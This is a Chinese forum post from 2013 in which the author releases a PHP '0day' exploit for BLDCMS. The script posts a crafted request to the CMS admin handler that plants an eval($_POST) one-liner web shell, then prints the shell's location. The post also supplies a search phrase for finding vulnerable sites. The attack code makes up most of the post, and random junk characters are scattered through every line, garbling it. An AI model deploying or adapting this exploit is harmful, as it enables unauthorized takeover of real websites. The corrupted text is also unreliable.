之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
9 D/ X, X; |+ A( r% B; \
5 X3 U2 s7 N6 y
' \. V, Y6 c) @( o话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
9 n; E! D+ h# b6 L; g0 T8 N8 g9 c: ? ( t3 B5 `' o! Q* ]' T8 e* g
既然都有人发了 我就把我之前写好的EXP放出来吧
5 [- K1 u2 o8 K; e2 {- a6 [" N
. m1 ]* k. ?+ U7 S& F7 ^view source print?01.php;">
3 @/ s1 z1 t f$ `- n5 s0 u02.<!--?php# X7 c. a0 B8 ]
03.echo "-------------------------------------------------------------------
; U# ?. N% ^) `8 Q2 I04.
1 }8 w5 L: _; f) j05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP& w! F4 m# ]3 I+ b! S! M
06.
" p) K, C/ I2 e; w7 D- [07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
1 R: b( w0 o/ }0 c2 z08. ! e# d! [' L* k
09.QQ:981009941\r\n 2013.3.21\r\n / B% h, ^" t, L
10.
' g0 |8 Q" i3 f9 T11. " c- o) k8 M0 y+ b# v& u
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码, E! Z/ g9 ^, P4 `8 n0 v. U: y# j
13. 1 B( y+ r$ S; ?, j
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------: _$ N `& g: U" ?) {
15. 4 [5 t( L6 i4 z' k1 ~
16.--------------------------------------------------------------------\r\n";4 u9 W6 R( {3 I5 I# \9 p5 z
17.$url=$argv[1];
6 `0 v0 y, ]7 }; Y" j18.$dir=$argv[2];& |9 a4 z' v, @3 x* H* X
19.$pass=$argv[3];
- \% g5 I! c' i! f! a! z: h20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';5 K3 w3 m" j& P' x5 o8 f
21.if (emptyempty($pass)||emptyempty($url))
6 j+ ], W# w" ^5 K) Q22.{exit("请输入参数");}
3 L# \" V, Y& }/ O23.else, O1 b3 N4 @ n" q! D$ U/ H: I
24.{! |4 g% q. F/ Y2 ?4 l! N; K
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
9 ?6 x( M9 m( l& K26.
+ z# l. B8 k; a% ~27.al;- r- E+ L, ?2 T$ h( A" G
28.$length = strlen($fuckdata);
; {5 ?# O: g" f' q: n29.function getshell($url,$pass)4 ~; K& Q. W5 P6 S+ v' z8 H
30.{
) H. c$ a1 | ] {0 g31.global $url,$dir,$pass,$eval,$length,$fuckdata;
! o3 l; W7 N4 M32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
6 z2 h- v5 ~, [) D. o" B( b33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
) q5 E3 L% J- N. U; y34.$header .= "User-Agent: MSIE\r\n"; {, y+ v# h3 A2 X
35.$header .= "Host:".$url."\r\n";9 U; ]& b2 s, i7 d `
36.$header .= "Content-Length: ".$length."\r\n";8 M2 J) v0 ?. x- M8 |/ A
37.$header .= "Connection: Close\r\n";6 T# t' t. ]% l6 l% ?* @6 `% p
38.$header .="\r\n";, }6 B# M/ N' K
39.$header .= $fuckdata."\r\n\r\n";
{" ^' O0 ^7 r: H40.$fp = fsockopen($url, 80,$errno,$errstr,15);1 E) d; u9 K- O# f+ v
41.if (!$fp)
% `& L( V/ J" \2 S! [5 i' d; E) g42.{/ {! [& r( K! {' `
43.exit ("利用失败:请检查指定目标是否能正常打开");* U; V$ _- P' j9 s
44.}
2 ?( d1 Y6 m2 p) ~2 e45.else{ if (!fputs($fp,$header))5 p# O2 W( N7 J
46.{exit ("利用失败");}6 j' p. t. k" v* z4 q4 K& s
47.else
! {; n6 T. j: [0 B9 j1 T48.{
9 h( v/ Q$ s% e B' Z6 |49.$receive = '';
+ c5 m% U3 z! \0 S8 `8 A$ }50.while (!feof($fp)) {. d l, U- G* t: J
51.$receive .= @fgets($fp, 1000);
4 R0 }; v# ~7 Z% @8 P52.}2 O L* k) B" q* `
53.@fclose($fp);) f; @+ L/ q2 d Q& u9 ]0 [
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标( D* x. B' N1 C- m
55. 0 ~8 ]0 Y' }+ n3 Z6 K6 h2 k7 M
56.GPC是否=off)";
# |0 ]5 ]- `% ?57.}}" l N. K5 y/ C4 V
58.}9 g6 t& @3 n/ Z* P6 G9 C
59.} E% o7 e' }5 s0 a
60.getshell($url,$pass);- \3 o/ g: d* H
61.?-->" T5 h% Y& K8 X6 v. Z. v) _
1 T" [& J; t" z( v; |
2 C0 h! m- Q' n. t$ I
& I, Z; S. s/ A2 ^2 Vby 数据流
9 R0 X7 z- |% i9 {. C |
发表于 2013-3-26 20:49:10
收藏
支持
反对